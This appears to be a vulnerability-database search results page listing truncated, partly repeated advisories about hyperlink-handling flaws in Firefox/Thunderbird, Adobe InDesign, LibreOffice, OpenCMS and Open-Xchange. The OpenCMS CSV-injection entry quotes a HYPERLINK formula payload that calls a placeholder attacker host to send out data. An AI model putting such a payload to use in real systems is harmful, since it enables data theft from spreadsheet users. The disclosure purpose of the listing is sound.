398 matches found
Information Disclosure
firefox/thunderbird is vulnerable to information disclosure. If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and...
CVE-2019-7107
Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2...
CVE-2019-7107
Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2...
Code injection
Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2...
Mozilla: Theft of user history data through drag and drop of hyperlinks to and from bookmarks
If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and transmitted to the content page via drop event data. This allows for...
CVE-2019-7107
Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2...
Mozilla Thunderbird < 60.7
The version of Thunderbird installed on the remote macOS or Mac OS X host is prior to 60.7. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2019-15 advisory. - A use-after-free vulnerability can occur in the chrome event handler when it is freed while still in use...
CVE-2019-11698
If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and transmitted to the content page via drop event data. This allows for...
UBUNTU-CVE-2019-11698
If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and transmitted to the content page via drop event data. This allows for...
Security vulnerabilities fixed in Thunderbird 60.7 — Mozilla
If hyperthreading is not disabled, a timing attack vulnerability exists, similar to previous Spectre attacks. Apple has shipped macOS 10.14.5 with an option to disable hyperthreading in applications running untrusted code in a thread through a new sysctl. Firefox now makes use of it on the main...
LibreOffice < 6.1.6, 6.2.x < 6.2.3 Hyperlink Processing Vulnerability (Windows)
The version of LibreOffice installed on the remote Windows host is prior to 6.1.6 or 6.2.x prior to 6.2.3. It is, therefore, affected by a hyperlink processing vulnerability. At attacker may exploit this issue by creating hyperlinks pointing to an executable on the target user's file system. This...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
CVE-2019-9847
A vulnerability in LibreOffice hyperlink processing allows an attacker to construct documents containing hyperlinks pointing to the location of an executable on the target users file system. If the hyperlink is activated by the victim the executable target is unconditionally launched. Under Windo...
Design/Logic Flaw
A vulnerability in LibreOffice hyperlink processing allows an attacker to construct documents containing hyperlinks pointing to the location of an executable on the target users file system. If the hyperlink is activated by the victim the executable target is unconditionally launched. Under Windo...
CVE-2019-9847
A vulnerability in LibreOffice hyperlink processing allows an attacker to construct documents containing hyperlinks pointing to the location of an executable on the target users file system. If the hyperlink is activated by the victim the executable target is unconditionally launched. Under Windo...
CVE-2019-9847
A vulnerability in LibreOffice hyperlink processing allows an attacker to construct documents containing hyperlinks pointing to the location of an executable on the target users file system. If the hyperlink is activated by the victim the executable target is unconditionally launched. Under Windo...
KLA11476 PE vulnerability in LibreOffice
Unspecified vulnerability was found in LibreOffice. Malicious users can exploit this vulnerability via hyperlink processing to gain privileges. Original advisories CVE-2019-9847 Executable hyperlink targets executed unconditionally on activation Related products LibreOffice CVE list CVE-2019-9847...
Open-Xchange: Another window.opener issue
Vulnerability Details: Appointment titles are rendered as hyperlink but were missing a protection against "tab nabbing". Risk: When following a hyperlink to a malicious website, the original tab location OX App Suite could be replaced with a URL chosen by the attacker. This can be exploited to...
Adobe InDesign Insecure Hyperlink Handling Vulnerability
Adobe InDesign is a desktop publishing DTP application from Adobe that is primarily used for typesetting and editing a variety of printed materials. An insecure hyperlink handling vulnerability exists in Adobe InDesign 14.0.1 and earlier versions. An attacker could exploit this vulnerability to...
openSUSE: Security Advisory for yast2-rmt (openSUSE-SU-2019:1089-1)
The remote host is missing an update for the Copyright C 2019 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...